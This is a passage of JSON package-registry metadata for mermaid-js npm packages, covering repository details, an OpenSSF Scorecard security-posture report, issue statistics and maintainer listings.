v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/sbom","scorecard":{"id":355670,"data":{"date":"2025-08-17T15:35:22Z","repo":{"name":"github.com/mermaid-js/mermaid","commit":"1f46c9e9bb556f9c321118407d0fa6788746e8b9"},"scorecard":{"version":"v5.1.1","commit":"cd152cb6742c5b8f2f3d2b5193b41d9c50905198"},"score":6.7,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 7 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#dangerous-workflow"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#packaging"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#code-review"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:23","Info: jobLevel 'contents' permission set to 'read': .github/workflows/link-checker.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/pr-labeler.yml:21","Info: jobLevel 'contents' permission set to 'read': .github/workflows/release-preview.yml:21","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/build-docs.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/check-readme-in-sync.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/e2e-applitools.yml:17","Warn: topLevel 'contents' permission set to 'write': .github/workflows/e2e-timings.yml:13","Info: topLevel 'contents' permission set to 'read': .github/workflows/e2e.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/issue-triage.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/link-checker.yml:23","Warn: topLevel 'contents' permission set to 'write': .github/workflows/lint.yml:12","Info: topLevel 'contents' permission set to 'read': .github/workflows/pr-labeler.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/publish-docs.yml:11","Warn: no topLevel permission defined: .github/workflows/release-preview-publish.yml:1","Warn: topLevel 'actions' permission set to 'write': .github/workflows/release-preview.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/release-preview.yml:13","Info: topLevel 'contents' permission set to 'read': .github/workflows/release.yml:11","Info: topLevel permissions set to 'read-all': .github/workflows/scorecard.yml:9","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:6","Warn: no topLevel permission defined: .github/workflows/unlock-reopened-issues.yml:1","Warn: no topLevel permission defined: .github/workflows/update-browserlist.yml:1","Warn: no topLevel permission defined: .github/workflows/validate-lockfile.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":9,"reason":"dependency not pinned by hash detected -- score normalized to 9","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:60: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: npmCommand not pinned by hash: .github/workflows/release-preview-publish.yml:32","Info:  45 out of  47 GitHub-owned GitHubAction dependencies pinned","Info:  35 out of  36 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned","Info:   0 out of   1 npmCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#signed-releases"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#license"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 28 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#sast"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found linked content: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found text in security policy: github.com/mermaid-js/.github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#security-policy"}},{"name":"Branch-Protection","score":1,"reason":"branch protection is not maximal on development and all release branches","details":["Warn: branch protection not enabled for branch 'release/10.9.3'","Warn: branch protection not enabled for branch 'release/10.9.2'","Info: 'allow deletion' disabled on branch 'develop'","Info: 'force pushes' disabled on branch 'develop'","Warn: branch 'develop' does not require approvers","Warn: codeowners review is not required on branch 'develop'","Info: status check found to merge onto on branch 'develop'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":9,"reason":"11 out of 12 merged PRs checked by a CI test -- score normalized to 9","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 15 contributing companies or organizations","details":["Info: found contributions from: Mermaid-Chart, OSDKDev, argoproj, check-spelling, evolutionizer, fossgect, garnercorp, gecthrissur, john deere, mermaid chart, mermaid-chart, mermaid-js, plantuml-stdlib, ringcentral, sarva"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":0,"reason":"23 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-968p-4wvh-cqc8","Warn: Project is vulnerable to: GHSA-xffm-g5w8-qvg7","Warn: Project is vulnerable to: GHSA-jr5f-v2jv-69x6","Warn: Project is vulnerable to: GHSA-v6h2-p8h4-qcjw","Warn: Project is vulnerable to: GHSA-pxg6-pf52-xh8x","Warn: Project is vulnerable to: GHSA-3xgq-45jj-v275","Warn: Project is vulnerable to: GHSA-67mh-4wv8-2f99","Warn: Project is vulnerable to: GHSA-mg2h-6x62-wpwc","Warn: Project is vulnerable to: GHSA-fjxv-7rqg-78g4","Warn: Project is vulnerable to: GHSA-4www-5p9h-95mh","Warn: Project is vulnerable to: GHSA-9gqv-wp59-fq42","Warn: Project is vulnerable to: GHSA-76c9-3jph-rj3q","Warn: Project is vulnerable to: GHSA-rhx6-c78j-4q9w","Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6","Warn: Project is vulnerable to: GHSA-c76h-2ccp-4975","Warn: Project is vulnerable to: GHSA-cxrh-j4jr-qwg3","Warn: Project is vulnerable to: GHSA-x574-m823-4x7w","Warn: Project is vulnerable to: GHSA-4r4m-qw57-chr8","Warn: Project is vulnerable to: GHSA-xcj6-pq6g-qj4x","Warn: Project is vulnerable to: GHSA-356w-63v5-8wf4","Warn: Project is vulnerable to: GHSA-859w-5945-r5v3","Warn: Project is vulnerable to: GHSA-4v9v-hfq4-rm2v","Warn: Project is vulnerable to: GHSA-9jgg-88mc-972h"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T09:31:17.427Z","repository_id":37269779,"created_at":"2025-08-18T09:31:17.427Z","updated_at":"2025-08-18T09:31:17.427Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":273713621,"owners_count":25154614,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-09-05T02:00:09.113Z","response_time":402,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"repo_metadata_updated_at":"2025-09-05T05:10:25.168Z","dependent_packages_count":0,"downloads":null,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":23.910488683896645,"dependent_packages_count":34.492502875637385,"stargazers_count":0.05913285968575388,"forks_count":0.3103403179882198,"docker_downloads_count":null,"average":14.693116184302001},"purl":"pkg:npm/%40mermaid-js/layout-tidy-tree","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@mermaid-js/layout-tidy-tree","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@mermaid-js/layout-tidy-tree","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@mermaid-js/layout-tidy-tree/dependencies","status":null,"funding_links":["https://github.com/sponsors/knsv","https://github.com/sponsors/sidharthv96"],"critical":null,"issue_metadata":{"last_synced_at":"2025-09-04T10:03:03.268Z","issues_count":1455,"pull_requests_count":1775,"avg_time_to_close_issue":28542620.459340658,"avg_time_to_close_pull_request":2087988.0680977055,"issues_closed_count":453,"pull_requests_closed_count":1351,"pull_request_authors_count":360,"issue_authors_count":1154,"avg_comments_per_issue":3.370446735395189,"avg_comments_per_pull_request":3.8850704225352115,"merged_pull_requests_count":1086,"bot_issues_count":2,"bot_pull_requests_count":340,"past_year_issues_count":440,"past_year_pull_requests_count":804,"past_year_avg_time_to_close_issue":1380901.3846153845,"past_year_avg_time_to_close_pull_request":1090907.6481835565,"past_year_issues_closed_count":65,"past_year_pull_requests_closed_count":523,"past_year_pull_request_authors_count":166,"past_year_issue_authors_count":355,"past_year_avg_comments_per_issue":0.32045454545454544,"past_year_avg_comments_per_pull_request":3.9776119402985075,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":166,"past_year_merged_pull_requests_count":408,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/issues","maintainers":[{"login":"sidharthv96","count":283,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sidharthv96"},{"login":"huynhicode","count":84,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huynhicode"},{"login":"knsv","count":70,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knsv"},{"login":"aloisklink","count":44,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aloisklink"},{"login":"saurabhg772244","count":27,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/saurabhg772244"},{"login":"Yokozuna59","count":27,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Yokozuna59"},{"login":"ashishjain0512","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashishjain0512"},{"login":"yari-dewalt","count":21,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/yari-dewalt"},{"login":"Yash-Singh1","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Yash-Singh1"},{"login":"NicolasNewman","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/NicolasNewman"},{"login":"omkarht","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/omkarht"},{"login":"rajat-ht","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rajat-ht"},{"login":"shubhamparikh2704","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubhamparikh2704"},{"login":"GDFaber","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/GDFaber"},{"login":"IOrlandoni","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/IOrlandoni"},{"login":"kedar49","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kedar49"},{"login":"tylerlong","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/tylerlong"},{"login":"Prashant-7718","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Prashant-7718"},{"login":"ferozmht","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ferozmht"},{"login":"shubham-mermaid","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubham-mermaid"},{"login":"darshanr0107","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/darshanr0107"}],"active_maintainers":[{"login":"sidharthv96","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sidharthv96"},{"login":"knsv","count":38,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knsv"},{"login":"huynhicode","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huynhicode"},{"login":"saurabhg772244","count":27,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/saurabhg772244"},{"login":"ashishjain0512","count":21,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashishjain0512"},{"login":"yari-dewalt","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/yari-dewalt"},{"login":"aloisklink","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aloisklink"},{"login":"omkarht","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/omkarht"},{"login":"rajat-ht","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rajat-ht"},{"login":"shubhamparikh2704","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubhamparikh2704"},{"login":"NicolasNewman","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/NicolasNewman"},{"login":"IOrlandoni","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/IOrlandoni"},{"login":"kedar49","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kedar49"},{"login":"darshanr0107","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/darshanr0107"},{"login":"Prashant-7718","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Prashant-7718"},{"login":"ferozmht","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ferozmht"},{"login":"shubham-mermaid","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubham-mermaid"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@mermaid-js%2Flayout-tidy-tree/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@mermaid-js%2Flayout-tidy-tree/version_numbers","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@mermaid-js%2Flayout-tidy-tree/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@mermaid-js%2Flayout-tidy-tree/related_packages","maintainers":[{"uuid":"sidv","login":"sidv","name":null,"email":"npmjs@sidharth.dev","url":null,"packages_count":20,"html_url":"https://www.npmjs.com/~sidv","role":null,"created_at":"2025-09-05T05:10:00.003Z","updated_at":"2025-09-05T05:10:00.003Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/sidv/packages"},{"uuid":"knsv","login":"knsv","name":null,"email":"knsv@sveido.com","url":null,"packages_count":13,"html_url":"https://www.npmjs.com/~knsv","role":null,"created_at":"2025-09-05T05:09:59.817Z","updated_at":"2025-09-05T05:09:59.817Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/knsv/packages"},{"uuid":"ugnikalnis","login":"ugnikalnis","name":null,"email":"mindaugas.laganeckas@gmail.com","url":null,"packages_count":10,"html_url":"https://www.npmjs.com/~ugnikalnis","role":null,"created_at":"2025-09-05T05:09:59.885Z","updated_at":"2025-09-05T05:09:59.885Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/ugnikalnis/packages"},{"uuid":"ashishjain0512","login":"ashishjain0512","name":null,"email":"ashishjain0512@gmail.com","url":null,"packages_count":11,"html_url":"https://www.npmjs.com/~ashishjain0512","role":null,"created_at":"2025-09-05T05:09:59.967Z","updated_at":"2025-09-05T05:09:59.967Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/ashishjain0512/packages"},{"uuid":"p_brolin47","login":"p_brolin47","name":null,"email":"per@mermaidchart.com","url":null,"packages_count":11,"html_url":"https://www.npmjs.com/~p_brolin47","role":null,"created_at":"2025-09-05T05:10:00.122Z","updated_at":"2025-09-05T05:10:00.122Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/p_brolin47/packages"},{"uuid":"aloisklink","login":"aloisklink","name":null,"email":"alois@aloisklink.com","url":null,"packages_count":15,"html_url":"https://www.npmjs.com/~aloisklink","role":null,"created_at":"2025-09-05T05:10:00.062Z","updated_at":"2025-09-05T05:10:00.062Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/aloisklink/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5131348,"maintainers_count":1051627,"namespaces_count":313328,"keywords_count":730052,"github":"npm","metadata":{"funded_packages_count":155759},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2025-09-05T07:36:50.205Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":11562387,"name":"@mermaid-js/tiny","ecosystem":"npm","description":"Tiny version of mermaid","homepage":"https://github.com/mermaid-js/mermaid#readme","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/mermaid-js/mermaid","keywords_array":[],"namespace":"mermaid-js","versions_count":11,"first_release_published_at":"2025-04-18T09:02:30.707Z","latest_release_published_at":"2025-09-04T15:08:05.187Z","latest_release_number":"11.11.0","last_synced_at":"2025-09-04T15:10:40.982Z","created_at":"2025-04-18T09:05:31.442Z","updated_at":"2025-09-05T05:10:25.186Z","registry_url":"https://www.npmjs.com/package/@mermaid-js/tiny","install_command":"npm install @mermaid-js/tiny","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"alpha":"0.0.1","latest":"11.11.0"}},"repo_metadata":{"id":37269779,"uuid":"26066727","full_name":"mermaid-js/mermaid","owner":"mermaid-js","description":"Generation of diagrams like flowcharts or sequence diagrams from text in a similar manner as markdown","archived":false,"fork":false,"pushed_at":"2025-09-01T12:33:10.000Z","size":254429,"stargazers_count":82566,"open_issues_count":1425,"forks_count":7984,"subscribers_count":651,"default_branch":"develop","last_synced_at":"2025-09-01T12:37:01.437Z","etag":null,"topics":["diagrams","diagrams-as-code","documentation","flowchart","javascript","mindmap","typescript","uml-diagrams"],"latest_commit_sha":null,"homepage":"https://mermaid.js.org","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/mermaid-js.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":"CITATION.cff","codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["knsv","sidharthv96"]}},"created_at":"2014-11-01T23:52:32.000Z","updated_at":"2025-09-01T12:31:32.000Z","dependencies_parsed_at":"2023-09-29T07:58:18.084Z","dependency_job_id":"8c149ccb-df9c-4cb4-9e51-2f99157720cd","html_url":"https://github.com/mermaid-js/mermaid","commit_stats":{"total_commits":8230,"total_committers":688,"mean_commits":"11.962209302325581","dds":0.823086269744836,"last_synced_commit":"b3dee343d1536c8425539643c345a63ff58f59f4"},"previous_names":["knsv/mermaid"],"tags_count":185,"template":false,"template_full_name":null,"purl":"pkg:github/mermaid-js/mermaid","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/refs/heads/develop","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/sbom","scorecard":{"id":355670,"data":{"date":"2025-08-17T15:35:22Z","repo":{"name":"github.com/mermaid-js/mermaid","commit":"1f46c9e9bb556f9c321118407d0fa6788746e8b9"},"scorecard":{"version":"v5.1.1","commit":"cd152cb6742c5b8f2f3d2b5193b41d9c50905198"},"score":6.7,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 7 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#dangerous-workflow"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#packaging"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#code-review"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:23","Info: jobLevel 'contents' permission set to 'read': .github/workflows/link-checker.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/pr-labeler.yml:21","Info: jobLevel 'contents' permission set to 'read': .github/workflows/release-preview.yml:21","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/build-docs.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/check-readme-in-sync.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/e2e-applitools.yml:17","Warn: topLevel 'contents' permission set to 'write': .github/workflows/e2e-timings.yml:13","Info: topLevel 'contents' permission set to 'read': .github/workflows/e2e.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/issue-triage.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/link-checker.yml:23","Warn: topLevel 'contents' permission set to 'write': .github/workflows/lint.yml:12","Info: topLevel 'contents' permission set to 'read': .github/workflows/pr-labeler.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/publish-docs.yml:11","Warn: no topLevel permission defined: .github/workflows/release-preview-publish.yml:1","Warn: topLevel 'actions' permission set to 'write': .github/workflows/release-preview.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/release-preview.yml:13","Info: topLevel 'contents' permission set to 'read': .github/workflows/release.yml:11","Info: topLevel permissions set to 'read-all': .github/workflows/scorecard.yml:9","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:6","Warn: no topLevel permission defined: .github/workflows/unlock-reopened-issues.yml:1","Warn: no topLevel permission defined: .github/workflows/update-browserlist.yml:1","Warn: no topLevel permission defined: .github/workflows/validate-lockfile.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":9,"reason":"dependency not pinned by hash detected -- score normalized to 9","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:20: update your workflow using 